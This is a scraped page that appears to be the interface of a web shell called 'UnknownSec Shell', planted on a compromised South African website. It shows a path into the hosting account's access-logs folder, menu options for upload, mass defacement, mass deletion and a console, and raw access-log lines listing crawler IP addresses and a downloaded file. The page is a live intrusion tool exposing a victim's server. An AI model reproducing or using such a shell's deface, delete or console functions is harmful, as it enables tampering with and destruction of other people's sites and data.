shell bypass 403
UnknownSec Shell
:
/
proc
/
thread-self
/
root
/
home
/
innovagencyco
/
access-logs
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
exxaro.innovagency.co.za
216.244.66.227 - - [10/Jan/2025:21:24:24 +0200] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.227 - - [10/Jan/2025:21:27:13 +0200] "GET /BombSquadFinalPresentation.pptx HTTP/1.1" 200 738480 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 205.210.31.251 - - [11/Jan/2025:00:56:04 +0200] "GET / HTTP/1.1" 200 145584 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 51.8.102.134 - - [11/Jan/2025:02:35:16 +0200] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
© 2025 UnknownSec